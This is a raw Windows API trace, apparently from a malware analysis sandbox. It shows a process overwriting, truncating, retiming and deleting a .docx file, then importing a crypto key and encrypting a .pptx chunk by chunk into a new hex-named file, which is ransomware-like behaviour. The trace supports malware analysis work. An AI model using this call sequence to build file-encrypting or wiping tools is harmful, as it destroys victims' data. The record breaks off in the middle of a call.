GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx"), fInfoLevelId=0x0, lpFileInformation=0x24032d8 | out: lpFileInformation=0x24032d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xef35eb30, ftCreationTime.dwHighDateTime=0x1d4f47b, ftLastAccessTime.dwLowDateTime=0x476d070, ftLastAccessTime.dwHighDateTime=0x1d4e8e4, ftLastWriteTime.dwLowDateTime=0x476d070, ftLastWriteTime.dwHighDateTime=0x1d4e8e4, nFileSizeHigh=0x0, nFileSizeLow=0x18b64)) returned 1 [0072.461] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0072.461] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.461] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0072.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.462] GetFileType (hFile=0x36c) returned 0x1 [0072.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0072.462] GetFileType (hFile=0x36c) returned 0x1 [0072.462] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.462] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.463] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.464] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.465] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.465] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.466] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.467] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.468] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.468] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.469] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.470] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.471] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.471] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.472] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.473] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.473] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.474] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.475] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.476] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.476] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.487] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.488] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.489] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.490] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.490] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0072.490] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.491] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.492] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.492] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.493] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.494] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.495] WriteFile (in: hFile=0x36c, lpBuffer=0x24037c0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x24037c0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.496] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.497] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.497] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.497] SetEndOfFile (hFile=0x36c) returned 1 [0072.499] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.499] CloseHandle (hObject=0x36c) returned 1 [0072.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.499] GetFileType (hFile=0x36c) returned 0x1 [0072.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.499] GetFileType (hFile=0x36c) returned 0x1 [0072.499] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0072.500] CloseHandle (hObject=0x36c) returned 1 [0072.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.500] GetFileType (hFile=0x36c) returned 0x1 [0072.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.500] GetFileType (hFile=0x36c) returned 0x1 [0072.500] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0072.500] CloseHandle (hObject=0x36c) returned 1 [0072.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.500] GetFileType (hFile=0x36c) returned 0x1 [0072.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.500] GetFileType (hFile=0x36c) returned 0x1 [0072.500] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0072.500] CloseHandle (hObject=0x36c) returned 1 [0072.501] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.501] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cwunr5ccuqwnx-ag1l3.docx")) returned 1 [0072.501] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CWUnR5CcUQWnX-ag1L3.docx", lpFilePart=0x0) returned 0x40 [0072.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", lpFilePart=0x0) returned 0x48 [0072.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9f02d8718596e6125725aace739a4c49"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.502] GetFileType (hFile=0x36c) returned 0x1 [0072.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.502] GetFileType (hFile=0x36c) returned 0x1 [0072.502] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0072.502] CloseHandle (hObject=0x36c) returned 1 [0072.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", lpFilePart=0x0) returned 0x48 [0072.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9f02d8718596e6125725aace739a4c49"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.502] GetFileType (hFile=0x36c) returned 0x1 [0072.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.502] GetFileType (hFile=0x36c) returned 0x1 [0072.502] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0072.503] CloseHandle (hObject=0x36c) returned 1 [0072.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49", lpFilePart=0x0) returned 0x48 [0072.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9F02D8718596E6125725AACE739A4C49" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9f02d8718596e6125725aace739a4c49"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.503] GetFileType (hFile=0x36c) returned 0x1 [0072.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.503] GetFileType (hFile=0x36c) returned 0x1 [0072.503] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0072.503] CloseHandle (hObject=0x36c) returned 1 [0072.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.504] CryptImportKey (in: hProv=0x1a5b7f10, pbData=0x2406c48, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0072.504] CryptContextAddRef (hProv=0x1a5b7f10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.504] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0072.504] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2406d38, pdwDataLen=0x1bf5db30 | out: pbData=0x2406d38*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0072.505] CryptImportKey (in: hProv=0x1a5b7f10, pbData=0x2406e58, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0072.505] CryptContextAddRef (hProv=0x1a5b7f10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.505] CryptContextAddRef (hProv=0x1a5b7f10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.505] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a5d32b0) returned 1 [0072.505] CryptContextAddRef (hProv=0x1a5b7f10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.505] CryptSetKeyParam (hKey=0x1a5d32b0, dwParam=0x4, pbData=0x2406fa0*=0x1, dwFlags=0x0) returned 1 [0072.505] CryptSetKeyParam (hKey=0x1a5d32b0, dwParam=0x1, pbData=0x2406f50, dwFlags=0x0) returned 1 [0072.505] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0072.505] CryptReleaseContext (hProv=0x1a5b7f10, dwFlags=0x0) returned 1 [0072.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0072.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.505] GetFileType (hFile=0x36c) returned 0x1 [0072.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0072.505] GetFileType (hFile=0x36c) returned 0x1 [0072.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", lpFilePart=0x0) returned 0x48 [0072.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0072.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7da8fedb9e07bf9f876d8d74e3d9d3d9"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0072.506] GetFileType (hFile=0x380) returned 0x1 [0072.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0072.506] GetFileType (hFile=0x380) returned 0x1 [0072.507] ReadFile (in: hFile=0x36c, lpBuffer=0x2407370, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2407370*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0072.509] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x241b388*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x241b388*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0072.510] WriteFile (in: hFile=0x380, lpBuffer=0x241b388*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x241b388*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0072.511] ReadFile (in: hFile=0x36c, lpBuffer=0x2407370, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2407370*, lpNumberOfBytesRead=0x1bf5da28*=0x3090, lpOverlapped=0x0) returned 1 [0072.512] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x242f3c8*, pdwDataLen=0x1bf5da80*=0x3090, dwBufLen=0x3090 | out: pbData=0x242f3c8*, pdwDataLen=0x1bf5da80*=0x3090) returned 1 [0072.512] WriteFile (in: hFile=0x380, lpBuffer=0x242f3c8*, nNumberOfBytesToWrite=0x3090, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x242f3c8*, lpNumberOfBytesWritten=0x1bf5da18*=0x3090, lpOverlapped=0x0) returned 1 [0072.512] ReadFile (in: hFile=0x36c, lpBuffer=0x2407370, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2407370*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0072.512] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2432498*, 